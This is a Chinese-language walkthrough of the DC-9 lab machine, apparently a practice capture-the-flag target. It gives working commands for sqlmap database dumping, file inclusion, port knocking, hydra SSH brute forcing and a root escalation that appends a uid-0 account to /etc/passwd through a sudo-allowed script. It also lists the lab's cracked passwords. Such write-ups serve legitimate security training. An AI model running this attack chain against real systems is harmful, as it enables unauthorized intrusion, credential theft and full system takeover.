DC-9靶机复现

一、信息收集

1.使用nmap对目标靶机进行扫描

发现开放了22（filtered ssh）和80端口

2.访问80端口

简单查看了一下网站，发现有搜索功能：

二、漏洞攻击

1.sql注入

搜索功能和数据库有交互，可以在此进行sql注入，抓包：

在此处抓包保存到文件中，然后利用sqlmap工具进行注入：

sqlmap -r "/root/桌面/1" --batch

发现可以注入，然后爆出数据库名：

sqlmap -r "/root/桌面/1" -dbs --batch

发现users数据库，查看此库中的表（继续用文件sql爆破失败了，切换成链接又可以了，不知道怎么回事）：

sqlmap -u "http://192.168.11.134/results.php" --data "search=1" -D Staff --tables

查看Users表的列：

sqlmap -u "http://192.168.11.134/results.php" --data "search=1" -D Staff -T Users --columns

查看表内的数据：

sqlmap -u "http://192.168.11.134/results.php" --data "search=1" -D Staff -T Users -C Username,Password --dump

使用了md5加密，sqlmap顺便就解码了transorbital1。用密码登录系统：

2.目录遍历

查看一下系统，发现在Manage界面有File does not exist：

目录文件不存在，也就是可以访问目录文件，做一下文件包含的目录爆破：

发现存在文件包含漏洞，查看可以利用的信息：

3.端口敲门服务

发现了/etc/knockd.conf文件，发现是是端口敲门服务，端口敲门服务，即：knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列序列号来“敲门”，使系统开启需要访问的服务端口，才能对外访问。不使用时，再使用自定义的序列号来“关门”，将端口关闭，不对外监听。进一步提升了服务和系统的安全性。

这里可以用nc或nmap去挨个敲门：

nc 192.168.11.134 7469
nc 192.168.11.134 8475
nc 192.168.11.134 9842
或者
nmap -p 7469 192.168.11.134
nmap -p 8475 192.168.11.134
nmap -p 9842 192.168.11.134
nmap -p 22 192.168.11.134

现在可以访问22端口，试一下用爆破，一开始爆不出来，回顾一下发现users数据库中还有一个UserDetails表：

sqlmap -u "http://192.168.11.134/results.php" --data "search=1" -D users -T UserDetails -C username,password --dump

4.ssh爆破

使用其中的用户名密码进行ssh爆破：

hydra -L /root/桌面/user -P /root/桌面/pass 192.168.11.134 ssh

得到能使用的用户名和密码：

login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee

挨个登录后发现janitor用户下有一个密码文件：

将密码收录到之前爆破的密码本中农，再次爆破：

发现一个新扫出来的用户，登录进去。

login: fredf password: B4-Tru3-001

三、提权

发现 sudo -l 可用，找到一个test文件：

发现是python相关的文件，查找文件位置：

创建一个账号，密码HSAH加密的：

openssl passwd -1 -salt sain sain

echo 'sain:$1$sain$UUM6YmNGatfHwxAHtRq/a1:0:0:root:/bin/bash'>> /tmp/sain.txt

sudo ./test /tmp/sain.txt /etc/passwd

su sain ，切换用户：

flag：

完成。